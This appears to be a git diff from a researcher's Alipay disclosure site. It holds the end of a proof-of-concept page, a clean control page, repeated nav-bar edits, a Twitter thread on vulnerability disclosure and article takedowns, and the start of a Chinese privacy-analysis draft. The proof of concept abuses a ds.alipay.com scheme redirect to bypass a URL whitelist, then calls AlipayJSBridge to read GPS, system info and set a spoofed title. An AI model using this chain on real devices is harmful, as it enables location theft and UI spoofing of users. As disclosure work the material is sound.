      html += '<div class="item"><span class="label">Platform: </span><span class="value">' + (bridgeData.sysinfo.platform || 'N/A') + '</span></div>';
    }
    if (bridgeData.titleSet) {
      html += '<div class="item"><span class="label">setTitle: </span><span class="value" style="color:#f5222d">CALLED — Title changed to fake value via bypass chain</span></div>';
    }
    if (bridgeData.toastShown) {
      html += '<div class="item"><span class="label">showToast: </span><span class="value" style="color:#f5222d">CALLED — Native toast displayed via bypass chain</span></div>';
    }
    if (bridgeData.gps) {
      if (bridgeData.gps.latitude) {
        html += '<div class="item"><span class="label">GPS (via bypass): </span><span class="value" style="color:#f5222d">' + bridgeData.gps.latitude + ', ' + bridgeData.gps.longitude + '</span></div>';
      } else {
        html += '<div class="item"><span class="label">GPS Result: </span><span class="value">' + JSON.stringify(bridgeData.gps) + '</span></div>';
      }
    }
    html += '</div>';
    // Vulnerability proof
    html += '<div class="result"><h2>Vulnerability Proof</h2>';
    html += '<div class="item"><span class="label">Root Cause: </span><span class="value">ds.alipay.com accepts arbitrary "scheme" parameter and performs open redirect</span></div>';
    html += '<div class="item"><span class="label">Code Evidence: </span><span class="value">stripLandingConfig contains ds.alipay.com with startAppNormal:true</span></div>';
    html += '<div class="item"><span class="label">Bypass Method: </span><span class="value">https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=ATTACKER</span></div>';
    html += '<div class="item"><span class="label">Why Critical: </span><span class="value" style="color:#f5222d">Defeats any domain whitelist — attack enters through Alipay\'s own trusted domain</span></div>';
    html += '<div class="item"><span class="label">Escalation: </span><span class="value">Combined with CVE-2/3/4, enables GPS theft + payment + UI spoofing via a single whitelisted link</span></div>';
    html += '</div>';
    // Comparison with CVE-1
    html += '<div class="result chain"><h2>CVE-6 vs CVE-1 Comparison</h2>';
    html += '<div class="item"><span class="label">CVE-1 (Direct): </span><span class="value">alipays://platformapi/startapp?appId=20000067&url=ATTACKER — blocked if app has URL whitelist</span></div>';
    html += '<div class="item"><span class="label">CVE-6 (Bypass): </span><span class="value" style="color:#f5222d">https://ds.alipay.com/?scheme=alipays://... — passes through trusted domain, bypasses whitelist</span></div>';
    html += '<div class="item"><span class="label">Additional Risk: </span><span class="value">ds.alipay.com link looks legitimate to users and security filters (HTTPS + alipay.com domain)</span></div>';
    html += '</div>';
    // Raw data
    html += '<div class="result"><h2>Raw Collected Data</h2>';
    html += '<div class="item"><span class="value" style="word-break:break-all;font-size:9px;font-family:monospace">' +
      JSON.stringify(bridgeData, null, 2).replace(/</g, '&lt;') + '</span></div>';
    html += '</div>';
  }
  el.innerHTML = html;
  document.getElementById('timestamp').textContent = 'Evidence collected at: ' + new Date().toISOString();
 }
 function doBridgeTests() {
  if (!window.AlipayJSBridge) return;
  // getSystemInfo
  AlipayJSBridge.call('getSystemInfo', {}, function(result) {
    bridgeData.sysinfo = result || {};
    render();
  });
  // setTitle — prove UI control via bypass
  AlipayJSBridge.call('setTitle', {title: '安全验证中心'}, function(result) {
    bridgeData.titleSet = true;
    render();
  });
  // showToast — prove native toast via bypass
  setTimeout(function() {
    AlipayJSBridge.call('showToast', {
      content: '白名单绕过验证成功',
      type: 'none',
      duration: 3000
    }, function(result) {
      bridgeData.toastShown = true;
      render();
    });
  }, 1500);
  // getLocation — prove GPS access via bypass
  setTimeout(function() {
    AlipayJSBridge.call('getLocation', {type: 2, accuracy: 1}, function(result) {
      if (result && (result.longitude || result.latitude)) {
        bridgeData.gps = {
          latitude: result.latitude,
          longitude: result.longitude,
          accuracy: result.accuracy,
          city: result.city
        };
      } else {
        bridgeData.gps = {error: JSON.stringify(result)};
      }
      render();
    });
  }, 3000);
 }
 function checkBridge() {
  if (window.AlipayJSBridge) {
    status.textContent = 'AlipayJSBridge DETECTED via whitelist bypass chain — Full access confirmed';
    status.style.color = '#f5222d';
    doBridgeTests();
  } else {
    status.textContent = 'Page loaded at ' + location.origin + ' — waiting for bridge...';
    render();
  }
 }
 document.addEventListener('AlipayJSBridgeReady', function() {
  checkBridge();
 });
 render();
 checkBridge();
 setTimeout(checkBridge, 1000);
 setTimeout(checkBridge, 3000);
 </script>
 </body></html>
--- a/poc/payload_test_clean.html
+++ b/poc/payload_test_clean.html
@@ -0,0 +1,39 @@
 <!DOCTYPE html>
 <html><head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width,initial-scale=1">
 <title>Clean Test</title>
 <style>
 body{font-family:sans-serif;padding:16px;background:#fff;color:#333}
 .box{background:#f6ffed;border:2px solid #52c41a;border-radius:10px;padding:16px;margin:12px 0}
 h2{color:#389e0d;font-size:15px}
 .item{padding:4px 0;font-size:13px}
 .label{color:#888;font-size:11px}
 .value{color:#333;font-weight:600}
 </style>
 </head><body>
 <h1 style="text-align:center;color:#1677ff;font-size:18px">Clean Page Test</h1>
 <p style="text-align:center;font-size:12px;color:#888">No JSAPI references at all</p>
 <div class="box"><h2>Environment</h2>
 <div class="item"><span class="label">Origin: </span><span class="value" id="v1"></span></div>
 <div class="item"><span class="label">URL: </span><span class="value" id="v2" style="word-break:break-all;font-size:10px"></span></div>
 <div class="item"><span class="label">UA: </span><span class="value" id="v3" style="word-break:break-all;font-size:10px"></span></div>
 <div class="item"><span class="label">Time: </span><span class="value" id="v4"></span></div>
 <div class="item"><span class="label">Bridge object: </span><span class="value" id="v5"></span></div>
 </div>
 <div class="box"><h2>This page has ZERO sensitive API keywords</h2>
 <div class="item">If you can see this text, the page rendered successfully.</div>
 <div class="item">If this is white screen, the issue is URL-level blocking.</div>
 </div>
 <script>
 document.getElementById('v1').textContent = location.origin;
 document.getElementById('v2').textContent = location.href;
 document.getElementById('v3').textContent = navigator.userAgent;
 document.getElementById('v4').textContent = new Date().toISOString();
 document.getElementById('v5').textContent = String(typeof window.AlipayJSBridge);
 </script>
 </body></html>
--- a/privacy-analysis.html
+++ b/privacy-analysis.html
@@ -10,7 +10,56 @@
 <meta property="og:url" content="https://innora.ai/zfb/privacy-analysis.html">
 <style>body{margin:0;padding:20px;background:#fff;}</style>
 </head>
-<body>
+<body style="padding-top:76px;">
 <!-- Innora Global Nav — injected -->
 <style>
 .innora-nav-wrap{position:fixed;top:0;left:0;width:100%;z-index:9999;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Noto Sans SC",sans-serif}
 .innora-nav{display:flex;justify-content:space-between;align-items:center;padding:0 20px;height:46px;background:rgba(18,18,26,.92);backdrop-filter:blur(10px);-webkit-backdrop-filter:blur(10px);border-bottom:1px solid rgba(255,255,255,.08)}
 .innora-nav a.brand{color:#e0e0e8;text-decoration:none;font-weight:600;font-size:.95rem}
 .innora-nav-links{display:flex;list-style:none;margin:0;padding:0;gap:12px;flex-wrap:wrap}
 .innora-nav-links a{color:#9898a8;text-decoration:none;font-size:.8rem;transition:color .2s}
 .innora-nav-links a:hover,.innora-nav-links a.active{color:#4488ff}
 .innora-badge{display:flex;justify-content:center;align-items:center;gap:8px;height:26px;background:#000;font-size:.7rem;font-family:'SF Mono','Fira Code',monospace;border-bottom:1px solid rgba(255,255,255,.06)}
 .innora-badge a{color:#44cc88;text-decoration:none}.innora-badge a:hover{text-decoration:underline}
 .innora-badge span{color:#666}
 .innora-hmb{display:none;cursor:pointer;background:none;border:none;padding:4px}
 .innora-hmb i{display:block;width:20px;height:2px;margin:4px 0;background:#e0e0e8;transition:.3s}
@media(max-width:900px){
 .innora-nav-links{display:none;position:absolute;top:46px;left:0;width:100%;flex-direction:column;background:rgba(18,18,26,.97);padding:8px 0;gap:0}
 .innora-nav-links.open{display:flex}
 .innora-nav-links li{text-align:center;padding:8px}
 .innora-hmb{display:block}
 }
 </style>
 <header class="innora-nav-wrap">
 <nav class="innora-nav">
 <a class="brand" href="/zfb/">Innora AI — Alipay Research</a>
 <ul class="innora-nav-links" id="inav">
 <li><a href="/zfb/">Main</a></li>
 <li><a href="/zfb/article_censorship.html">Censorship</a></li>
 <li><a href="/zfb/patchproxy-146k.html">PatchProxy</a></li>
 <li><a href="/zfb/wifi-rtt-tracking.html">WiFi RTT</a></li>
 <li><a href="/zfb/transport-encryption.html">Encryption</a></li>
 <li><a href="/zfb/privacy-analysis.html">Privacy</a></li>
 <li><a href="/zfb/regulatory-complaint.html">Regulatory</a></li>
 <li><a href="/zfb/rebuttal.html">Rebuttal</a></li>
 </ul>
 <button class="innora-hmb" onclick="document.getElementById('inav').classList.toggle('open')"><i></i><i></i><i></i></button>
 </nav>
 <div class="innora-badge">
 <span>Verify:</span>
 <a href="https://github.com/sgInnora/alipay-securityguard-analysis">Docker 37/37</a>
 <span>|</span>
 <a href="https://zenodo.org/records/19186848">Zenodo DOI</a>
 <span>|</span>
 <a href="https://eprint.iacr.org/2026/526">IACR 2026/526</a>
 <span>|</span>
 <a href="https://packetstormsecurity.com/files/217089/">Packet Storm</a>
 </div>
 </header>
 <!-- /Innora Global Nav -->
 <!-- Alipay Privacy Analysis | WeChat Public | 2026-03-17 --><section style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'PingFang SC', 'Hiragino Sans GB', 'Microsoft YaHei', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 1.75; color: #2c3e50; text-align: justify; letter-spacing: 0.5px; padding: 0 6px"><h1 style="font-size: 22px; font-weight: bold; color: #1a252f; margin: 30px 0 15px; border-bottom: 2px solid #00d4aa; padding-bottom: 10px; line-height: 1.4; background: linear-gradient(90deg, rgba(0,212,170,0.1) 0%, transparent 100%); padding: 10px 0 10px 12px">支付宝需要监控你的截屏、蓝牙和通话吗？一次完整的逆向工程分析</h1>
 <h2 style="font-size: 20px; font-weight: bold; color: #1a252f; margin: 25px 0 12px; padding-left: 12px; border-left: 4px solid #00d4aa; line-height: 1.4">对支付宝APK (v10.8.30) 208个API拦截点、22个行为监控和97%无保护接口的代码级分析</h2>
--- a/rebuttal.html
+++ b/rebuttal.html
@@ -212,7 +212,56 @@ footer {
 }
 </style>
 </head>
-<body>
+<body style="padding-top:76px;">
 <!-- Innora Global Nav — injected -->
 <style>
 .innora-nav-wrap{position:fixed;top:0;left:0;width:100%;z-index:9999;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Noto Sans SC",sans-serif}
 .innora-nav{display:flex;justify-content:space-between;align-items:center;padding:0 20px;height:46px;background:rgba(18,18,26,.92);backdrop-filter:blur(10px);-webkit-backdrop-filter:blur(10px);border-bottom:1px solid rgba(255,255,255,.08)}
 .innora-nav a.brand{color:#e0e0e8;text-decoration:none;font-weight:600;font-size:.95rem}
 .innora-nav-links{display:flex;list-style:none;margin:0;padding:0;gap:12px;flex-wrap:wrap}
 .innora-nav-links a{color:#9898a8;text-decoration:none;font-size:.8rem;transition:color .2s}
 .innora-nav-links a:hover,.innora-nav-links a.active{color:#4488ff}
 .innora-badge{display:flex;justify-content:center;align-items:center;gap:8px;height:26px;background:#000;font-size:.7rem;font-family:'SF Mono','Fira Code',monospace;border-bottom:1px solid rgba(255,255,255,.06)}
 .innora-badge a{color:#44cc88;text-decoration:none}.innora-badge a:hover{text-decoration:underline}
 .innora-badge span{color:#666}
 .innora-hmb{display:none;cursor:pointer;background:none;border:none;padding:4px}
 .innora-hmb i{display:block;width:20px;height:2px;margin:4px 0;background:#e0e0e8;transition:.3s}
@media(max-width:900px){
 .innora-nav-links{display:none;position:absolute;top:46px;left:0;width:100%;flex-direction:column;background:rgba(18,18,26,.97);padding:8px 0;gap:0}
 .innora-nav-links.open{display:flex}
 .innora-nav-links li{text-align:center;padding:8px}
 .innora-hmb{display:block}
 }
 </style>
 <header class="innora-nav-wrap">
 <nav class="innora-nav">
 <a class="brand" href="/zfb/">Innora AI — Alipay Research</a>
 <ul class="innora-nav-links" id="inav">
 <li><a href="/zfb/">Main</a></li>
 <li><a href="/zfb/article_censorship.html">Censorship</a></li>
 <li><a href="/zfb/patchproxy-146k.html">PatchProxy</a></li>
 <li><a href="/zfb/wifi-rtt-tracking.html">WiFi RTT</a></li>
 <li><a href="/zfb/transport-encryption.html">Encryption</a></li>
 <li><a href="/zfb/privacy-analysis.html">Privacy</a></li>
 <li><a href="/zfb/regulatory-complaint.html">Regulatory</a></li>
 <li><a href="/zfb/rebuttal.html">Rebuttal</a></li>
 </ul>
 <button class="innora-hmb" onclick="document.getElementById('inav').classList.toggle('open')"><i></i><i></i><i></i></button>
 </nav>
 <div class="innora-badge">
 <span>Verify:</span>
 <a href="https://github.com/sgInnora/alipay-securityguard-analysis">Docker 37/37</a>
 <span>|</span>
 <a href="https://zenodo.org/records/19186848">Zenodo DOI</a>
 <span>|</span>
 <a href="https://eprint.iacr.org/2026/526">IACR 2026/526</a>
 <span>|</span>
 <a href="https://packetstormsecurity.com/files/217089/">Packet Storm</a>
 </div>
 </header>
 <!-- /Innora Global Nav -->
 <!-- Hero -->
 <div class="hero">
--- a/regulatory-complaint.html
+++ b/regulatory-complaint.html
@@ -1,4 +1,53 @@
-<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>208项API监控，代码可被远程修改：我把支付宝举报给了国家</title><meta name="description" content="向中国网信办正式举报支付宝隐私违规 — 举报全文与全球监管进展"><style>body{margin:0;padding:20px;background:#fff;}</style></head><body>
+<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>208项API监控，代码可被远程修改：我把支付宝举报给了国家</title><meta name="description" content="向中国网信办正式举报支付宝隐私违规 — 举报全文与全球监管进展"><style>body{margin:0;padding:20px;background:#fff;}</style></head><body style="padding-top:76px;">
 <!-- Innora Global Nav — injected -->
 <style>
 .innora-nav-wrap{position:fixed;top:0;left:0;width:100%;z-index:9999;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Noto Sans SC",sans-serif}
 .innora-nav{display:flex;justify-content:space-between;align-items:center;padding:0 20px;height:46px;background:rgba(18,18,26,.92);backdrop-filter:blur(10px);-webkit-backdrop-filter:blur(10px);border-bottom:1px solid rgba(255,255,255,.08)}
 .innora-nav a.brand{color:#e0e0e8;text-decoration:none;font-weight:600;font-size:.95rem}
 .innora-nav-links{display:flex;list-style:none;margin:0;padding:0;gap:12px;flex-wrap:wrap}
 .innora-nav-links a{color:#9898a8;text-decoration:none;font-size:.8rem;transition:color .2s}
 .innora-nav-links a:hover,.innora-nav-links a.active{color:#4488ff}
 .innora-badge{display:flex;justify-content:center;align-items:center;gap:8px;height:26px;background:#000;font-size:.7rem;font-family:'SF Mono','Fira Code',monospace;border-bottom:1px solid rgba(255,255,255,.06)}
 .innora-badge a{color:#44cc88;text-decoration:none}.innora-badge a:hover{text-decoration:underline}
 .innora-badge span{color:#666}
 .innora-hmb{display:none;cursor:pointer;background:none;border:none;padding:4px}
 .innora-hmb i{display:block;width:20px;height:2px;margin:4px 0;background:#e0e0e8;transition:.3s}
@media(max-width:900px){
 .innora-nav-links{display:none;position:absolute;top:46px;left:0;width:100%;flex-direction:column;background:rgba(18,18,26,.97);padding:8px 0;gap:0}
 .innora-nav-links.open{display:flex}
 .innora-nav-links li{text-align:center;padding:8px}
 .innora-hmb{display:block}
 }
 </style>
 <header class="innora-nav-wrap">
 <nav class="innora-nav">
 <a class="brand" href="/zfb/">Innora AI — Alipay Research</a>
 <ul class="innora-nav-links" id="inav">
 <li><a href="/zfb/">Main</a></li>
 <li><a href="/zfb/article_censorship.html">Censorship</a></li>
 <li><a href="/zfb/patchproxy-146k.html">PatchProxy</a></li>
 <li><a href="/zfb/wifi-rtt-tracking.html">WiFi RTT</a></li>
 <li><a href="/zfb/transport-encryption.html">Encryption</a></li>
 <li><a href="/zfb/privacy-analysis.html">Privacy</a></li>
 <li><a href="/zfb/regulatory-complaint.html">Regulatory</a></li>
 <li><a href="/zfb/rebuttal.html">Rebuttal</a></li>
 </ul>
 <button class="innora-hmb" onclick="document.getElementById('inav').classList.toggle('open')"><i></i><i></i><i></i></button>
 </nav>
 <div class="innora-badge">
 <span>Verify:</span>
 <a href="https://github.com/sgInnora/alipay-securityguard-analysis">Docker 37/37</a>
 <span>|</span>
 <a href="https://zenodo.org/records/19186848">Zenodo DOI</a>
 <span>|</span>
 <a href="https://eprint.iacr.org/2026/526">IACR 2026/526</a>
 <span>|</span>
 <a href="https://packetstormsecurity.com/files/217089/">Packet Storm</a>
 </div>
 </header>
 <!-- /Innora Global Nav -->
 <!-- Alipay Regulatory Complaint v2 | WeChat Public | 2026-03-18 | Opus+Gemini 30R Optimized --><section style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'PingFang SC', 'Hiragino Sans GB', 'Microsoft YaHei', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 1.75; color: #2c3e50; text-align: justify; letter-spacing: 0.5px; padding: 0 6px"><h1 style="font-size: 22px; font-weight: bold; color: #1a252f; margin: 30px 0 15px; border-bottom: 2px solid #00d4aa; padding-bottom: 10px; line-height: 1.4; background: linear-gradient(90deg, rgba(0,212,170,0.1) 0%, transparent 100%); padding: 10px 0 10px 12px">208项API监控，代码可被远程修改：我把支付宝举报给了国家</h1>
 <p style="margin: 20px 0; line-height: 1.75; text-indent: 0; font-size: 15px; font-weight: bold; color: #E06C75; border: 1px solid #E06C75; border-radius: 6px; padding: 15px 20px; background: rgba(224,108,117,0.05)">本文永久地址：https://innora.ai/zfb/regulatory-complaint.html<br/>如果本文再次消失，你知道去哪里找到它。</p>
--- a/transport-encryption.html
+++ b/transport-encryption.html
@@ -6,7 +6,56 @@
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <title>支付宝的加密"开关"——国密SM4可被远程关闭，RPC加密默认关闭</title>
 </head>
-<body>
+<body style="padding-top:76px;">
 <!-- Innora Global Nav — injected -->
 <style>
 .innora-nav-wrap{position:fixed;top:0;left:0;width:100%;z-index:9999;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Noto Sans SC",sans-serif}
 .innora-nav{display:flex;justify-content:space-between;align-items:center;padding:0 20px;height:46px;background:rgba(18,18,26,.92);backdrop-filter:blur(10px);-webkit-backdrop-filter:blur(10px);border-bottom:1px solid rgba(255,255,255,.08)}
 .innora-nav a.brand{color:#e0e0e8;text-decoration:none;font-weight:600;font-size:.95rem}
 .innora-nav-links{display:flex;list-style:none;margin:0;padding:0;gap:12px;flex-wrap:wrap}
 .innora-nav-links a{color:#9898a8;text-decoration:none;font-size:.8rem;transition:color .2s}
 .innora-nav-links a:hover,.innora-nav-links a.active{color:#4488ff}
 .innora-badge{display:flex;justify-content:center;align-items:center;gap:8px;height:26px;background:#000;font-size:.7rem;font-family:'SF Mono','Fira Code',monospace;border-bottom:1px solid rgba(255,255,255,.06)}
 .innora-badge a{color:#44cc88;text-decoration:none}.innora-badge a:hover{text-decoration:underline}
 .innora-badge span{color:#666}
 .innora-hmb{display:none;cursor:pointer;background:none;border:none;padding:4px}
 .innora-hmb i{display:block;width:20px;height:2px;margin:4px 0;background:#e0e0e8;transition:.3s}
@media(max-width:900px){
 .innora-nav-links{display:none;position:absolute;top:46px;left:0;width:100%;flex-direction:column;background:rgba(18,18,26,.97);padding:8px 0;gap:0}
 .innora-nav-links.open{display:flex}
 .innora-nav-links li{text-align:center;padding:8px}
 .innora-hmb{display:block}
 }
 </style>
 <header class="innora-nav-wrap">
 <nav class="innora-nav">
 <a class="brand" href="/zfb/">Innora AI — Alipay Research</a>
 <ul class="innora-nav-links" id="inav">
 <li><a href="/zfb/">Main</a></li>
 <li><a href="/zfb/article_censorship.html">Censorship</a></li>
 <li><a href="/zfb/patchproxy-146k.html">PatchProxy</a></li>
 <li><a href="/zfb/wifi-rtt-tracking.html">WiFi RTT</a></li>
 <li><a href="/zfb/transport-encryption.html">Encryption</a></li>
 <li><a href="/zfb/privacy-analysis.html">Privacy</a></li>
 <li><a href="/zfb/regulatory-complaint.html">Regulatory</a></li>
 <li><a href="/zfb/rebuttal.html">Rebuttal</a></li>
 </ul>
 <button class="innora-hmb" onclick="document.getElementById('inav').classList.toggle('open')"><i></i><i></i><i></i></button>
 </nav>
 <div class="innora-badge">
 <span>Verify:</span>
 <a href="https://github.com/sgInnora/alipay-securityguard-analysis">Docker 37/37</a>
 <span>|</span>
 <a href="https://zenodo.org/records/19186848">Zenodo DOI</a>
 <span>|</span>
 <a href="https://eprint.iacr.org/2026/526">IACR 2026/526</a>
 <span>|</span>
 <a href="https://packetstormsecurity.com/files/217089/">Packet Storm</a>
 </div>
 </header>
 <!-- /Innora Global Nav -->
 <section style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'PingFang SC', 'Hiragino Sans GB', 'Microsoft YaHei', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 1.75; color: #3f3f3f; text-align: justify; letter-spacing: 0.5px; padding: 0 6px">
 <!-- [0] AI辅助声明 -->
--- a/twitter_thread.md
+++ b/twitter_thread.md
@@ -0,0 +1,192 @@
 # Twitter Thread — Cybersecurity Law as Censorship Weapon
 # 推特线程 — 当网络安全法成为审查武器
 ---
 ## Thread 1/15 (Hook)
 On World Consumer Rights Day (March 15), ALL FOUR of my security research articles were forcibly deleted from WeChat.
 Reason: "Violation of China's Cybersecurity Law."
 The irony? The SAME complaint was rejected by WeChat 4 days earlier.
 What changed? The legal grounds. Not the facts. 🧵
 ---
 ## Thread 2/15 (Context)
 I'm a CISSP-certified security researcher. I found 17 vulnerabilities (CVSS 7.4-9.3) in a payment app used by 1 BILLION+ people.
 The core: a whitelist bypass (CVSS 9.3) enabling silent GPS theft (8.81m accuracy), payment hijacking, and worm-like propagation.
 308 server logs. 42 screenshots. 3 devices. 3 countries.
 ---
 ## Thread 3/15 (Disclosure Timeline)
 Timeline:
 - Feb 25-Mar 7: 4 rounds of private reports
 - Mar 7: Vendor's security lead verbally acknowledged severity (23-min recorded call)
 - Mar 10: Vendor's final answer: "Normal functionality"
 - Mar 11: Public disclosure after exhausting private channels
 ---
 ## Thread 4/15 (First Censorship Attempt)
 4 hours 29 minutes after publication:
 Beijing Geyun Law Firm (representing Ant Group) filed a "reputation infringement" complaint to WeChat.
 WeChat's verdict: "Unable to verify infringement. Complaint NOT supported."
 Complaint #428526665 — REJECTED.
 ---
 ## Thread 5/15 (Second Attempt)
 March 15: Same complainant, different weapon.
 This time: "Violation of Cybersecurity Law."
 Result: ALL 4 articles deleted.
 No specific article cited. No appeal process. No identification of violating content.
 First attempt: "reputation" → FAILED
 Second attempt: "Cybersecurity Law" → SUCCEEDED
 This is legal forum shopping.
 ---
 ## Thread 6/15 (International Validation)
 Meanwhile, the international community validated the research:
 - Packet Storm Security: Advisory #217089 (sandbox-verified)
 - MITRE: 6 CVEs accepted (Ticket #2005801)
 - Apple: Investigation Case OE01052449093014
 - Google Play: Policy violation review #9-7515000040640
 - CSSF Luxembourg: Whistleblowing case CSSFWB-2026-080
 ---
 ## Thread 7/15 (Global Response)
 189 emails → 22 countries → 38+ responses:
 - HKMA Hong Kong: Formal complaint filed
 - PDPC Singapore: Privacy investigation #00629724
 - FCA UK: Whistleblowing confirmed
 - CSSF Luxembourg: Linked to €214K AML fine (2025)
 - OAIC Australia: Intake confirmed
 - EDPB EU: Cross-border complaint confirmed
 ---
 ## Thread 8/15 (The Contrast)
 Same facts, opposite treatment:
 🌍 International: CVSS 9.3 + CVE pending + Packet Storm archived
 🇨🇳 China: "Normal functionality" + articles deleted
 🌍 International: ISO 29147 compliant + EU whistleblower protection
 🇨🇳 China: "Violating Cybersecurity Law"
 🌍 International: 16 regulators investigating
 🇨🇳 China: Content censored
 ---
 ## Thread 9/15 (EU Whistleblower)
 EU Whistleblower Directive 2019/1937:
 - Art.19: PROHIBITS retaliation against reporters
 - Art.21: Retaliation = "any action causing unjustified detriment"
 - Art.22-23: Compensation + dissuasive penalties
 Alipay (Europe) Ltd S.A. holds an EMI license from CSSF Luxembourg.
 Cross-border content deletion = potential EU retaliation?
 ---
 ## Thread 10/15 (Pattern)
 This isn't isolated. @disaborar's Research Threats Database documents 80+ cases:
 - Columbus, Ohio vs researcher (2024)
 - NEWAG vs Dragon Sector in Poland (2023)
 - Modern Solution criminal prosecution in Germany (2024)
 - FreeHour: 4 CS students arrested in Malta (2023)
 But THIS case may be the first where a vendor switched legal grounds after rejection.
 ---
 ## Thread 11/15 (Real Threat)
 Deleting articles doesn't delete vulnerabilities.
 The attack chain is still archived on:
 1. Packet Storm #217089
 2. GitHub: sgInnora/alipay-deeplink-research
 3. innora.ai/zfb/
 The ONLY effect: 1 billion Chinese users can't learn about risks in their daily payment app.
 THAT is the real cybersecurity threat.
 ---
 ## Thread 12/15 (Escalation Pattern)
 The suppression pattern:
 1. Verbal denial ("normal functionality")
 2. Lawyer letter ("reputation infringement") → REJECTED
 3. Legal upgrade ("Cybersecurity Law") → DELETED
 4. Server-side PoC interception
 Each failure escalates to a more unassailable legal weapon.
 ---
 ## Thread 13/15 (The Fear Test)
 Imagine: you find a critical vulnerability. You report it privately. The vendor says "normal functionality." You publish. A lawyer files a complaint. The platform rejects it.
 You think you're safe.
 4 days later, same lawyer, same complaint, different law cited. All your articles vanish. No appeal.
 Would YOU still dare to do security research?
 ## Thread 13.5/15 (Call to Action)
 To the global security research community:
 When "Cybersecurity Law" deletes security research instead of protecting cybersecurity, the law itself has become an unpatched zero-day.
 We need:
 - Global Safe Harbor for researchers
 - Platform moderation independence
 - Cross-border retaliation accountability
 ---
 ## Thread 14/15 (Evidence)
 All evidence is public:
 📄 Full report: innora.ai/zfb/
 💻 GitHub: github.com/sgInnora/alipay-deeplink-research
 🔒 Packet Storm: #217089
 📋 MITRE: Ticket #2005801
 🏛️ CSSF: CSSFWB-2026-080
 🇭🇰 HKMA: CE20260313175412
 Truth doesn't need a takedown notice.
 ---
 ## Thread 15/15 (License)
 This article is CC BY 4.0. Freely republish, translate, cite.
 The 4 deleted WeChat articles are preserved at innora.ai/zfb/ and will be updated with this analysis.
 #SecurityResearch #VulnerabilityDisclosure #Censorship #CybersecurityLaw #WhistleblowerProtection #AntGroup #PacketStorm #CVE #InfoSec
 Contact: feng@innora.ai
--- a/wechat_article.html
+++ b/wechat_article.html
@@ -9,7 +9,56 @@ body { max-width: 640px; margin: 0 auto; padding: 16px; font-family: -apple-syst
 a { color: #1a6dff; }
 </style>
 </head>
-<body>
+<body style="padding-top:76px;">
 <!-- Innora Global Nav — injected -->
 <style>
 .innora-nav-wrap{position:fixed;top:0;left:0;width:100%;z-index:9999;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Noto Sans SC",sans-serif}
 .innora-nav{display:flex;justify-content:space-between;align-items:center;padding:0 20px;height:46px;background:rgba(18,18,26,.92);backdrop-filter:blur(10px);-webkit-backdrop-filter:blur(10px);border-bottom:1px solid rgba(255,255,255,.08)}
 .innora-nav a.brand{color:#e0e0e8;text-decoration:none;font-weight:600;font-size:.95rem}
 .innora-nav-links{display:flex;list-style:none;margin:0;padding:0;gap:12px;flex-wrap:wrap}
 .innora-nav-links a{color:#9898a8;text-decoration:none;font-size:.8rem;transition:color .2s}
 .innora-nav-links a:hover,.innora-nav-links a.active{color:#4488ff}
 .innora-badge{display:flex;justify-content:center;align-items:center;gap:8px;height:26px;background:#000;font-size:.7rem;font-family:'SF Mono','Fira Code',monospace;border-bottom:1px solid rgba(255,255,255,.06)}
 .innora-badge a{color:#44cc88;text-decoration:none}.innora-badge a:hover{text-decoration:underline}
 .innora-badge span{color:#666}
 .innora-hmb{display:none;cursor:pointer;background:none;border:none;padding:4px}
 .innora-hmb i{display:block;width:20px;height:2px;margin:4px 0;background:#e0e0e8;transition:.3s}
@media(max-width:900px){
 .innora-nav-links{display:none;position:absolute;top:46px;left:0;width:100%;flex-direction:column;background:rgba(18,18,26,.97);padding:8px 0;gap:0}
 .innora-nav-links.open{display:flex}
 .innora-nav-links li{text-align:center;padding:8px}
 .innora-hmb{display:block}
 }
 </style>
 <header class="innora-nav-wrap">
 <nav class="innora-nav">
 <a class="brand" href="/zfb/">Innora AI — Alipay Research</a>
 <ul class="innora-nav-links" id="inav">
 <li><a href="/zfb/">Main</a></li>
 <li><a href="/zfb/article_censorship.html">Censorship</a></li>
 <li><a href="/zfb/patchproxy-146k.html">PatchProxy</a></li>
 <li><a href="/zfb/wifi-rtt-tracking.html">WiFi RTT</a></li>
 <li><a href="/zfb/transport-encryption.html">Encryption</a></li>
 <li><a href="/zfb/privacy-analysis.html">Privacy</a></li>
 <li><a href="/zfb/regulatory-complaint.html">Regulatory</a></li>
 <li><a href="/zfb/rebuttal.html">Rebuttal</a></li>
 </ul>
 <button class="innora-hmb" onclick="document.getElementById('inav').classList.toggle('open')"><i></i><i></i><i></i></button>
 </nav>
 <div class="innora-badge">
 <span>Verify:</span>
 <a href="https://github.com/sgInnora/alipay-securityguard-analysis">Docker 37/37</a>
 <span>|</span>
 <a href="https://zenodo.org/records/19186848">Zenodo DOI</a>
 <span>|</span>
 <a href="https://eprint.iacr.org/2026/526">IACR 2026/526</a>
 <span>|</span>
 <a href="https://packetstormsecurity.com/files/217089/">Packet Storm</a>
 </div>
 </header>
 <!-- /Innora Global Nav -->
 <!--
  微信公众号发布说明：
  1. 在微信公众号后台 → 新建图文
--- a/wechat_privacy_article_draft.md
+++ b/wechat_privacy_article_draft.md
@@ -0,0 +1,242 @@
 # 支付宝需要监控你的截屏、蓝牙和通话吗？一次完整的逆向工程分析
 > 对支付宝APK (v10.8.30) 208个API拦截点、22个行为监控事件和97%无保护内部接口的代码级分析
 **本文永久地址**: https://innora.ai/zfb/privacy-analysis.html
 **如果本文被删除，请访问上述地址阅读完整版。**
 ---
 ## 引言
